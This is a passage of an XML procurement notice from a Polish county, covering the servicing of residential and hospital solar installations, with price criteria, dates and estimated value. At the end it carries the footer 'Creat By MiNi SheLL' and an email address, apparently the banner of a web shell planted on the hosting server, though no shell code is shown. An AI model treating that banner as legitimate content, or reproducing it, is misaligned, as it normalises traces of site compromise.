</zmiana_umowy><kryt_cena></kryt_cena><kryt_0>cena</kryt_0><kryt_0p>60</kryt_0p><czy_aukcja>N</czy_aukcja><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci></ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>08/02/2017</data_skl><godz_skl>10:00</godz_skl><miejsce></miejsce><IV_4_4_jezyki>język polski</IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>T</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu /><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6></IV_6_6><IV_6_5 /><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie>T</czy_uniewaznienie><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci>1</nr_czesci><nazwa>wykonanie serwisu 2349 instalacji solarnych, zlokalizowanych na budynkach mieszkalnych na terenie Powiatu Suskiego wraz z dostawą niezbędnych części do serwisowania,</nazwa><opis>wykonanie serwisu 2349 instalacji solarnych, zlokalizowanych na budynkach mieszkalnych na terenie Powiatu Suskiego wraz z dostawą niezbędnych części do serwisowania
Szczegółowy Opis przedmiotu zamówienia jest zawarty w załączniku 4a do SIWZ
Przedmiotowe zamówienie powinno być zrealizowane zgodnie z wzorem umowy, który jest ustalony w załączniku 5a do SIWZ
</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal>266468.64</szacunkowa_wartosc_zamowienia_zal><waluta_zal>PLN</waluta_zal><cpv1c>50720000-8</cpv1c>50510000-3<czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>31/12/2017</data_kon><kryt_cena></kryt_cena><kryt_1>cena</kryt_1><kryt_1p>60</kryt_1p></cz_0><cz_1><nr_czesci>2</nr_czesci><nazwa>wykonanie serwisu instalacji solarnej zlokalizowanej na budynku Szpitala Powiatowego w Suchej Beskidzkiej wraz z dostawą niezbędnych części do serwisowania</nazwa><opis>wykonanie serwisu instalacji solarnej zlokalizowanej na budynku Szpitala Powiatowego w Suchej Beskidzkiej wraz z dostawą niezbędnych części do serwisowania
Szczegółowy Opis przedmiotu zamówienia jest zawarty  w załączniku 4b do SIWZ.
Przedmiotowe zamówienie powinno być zrealizowane zgodnie z wzorem umowy, który jest ustalony w załączniku 5b do SIWZ.
</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>50720000-8</cpv1c>50510000-3<czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>31/12/2017</data_kon><kryt_cena></kryt_cena><kryt_1>cena</kryt_1><kryt_1p>60</kryt_1p></cz_1></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com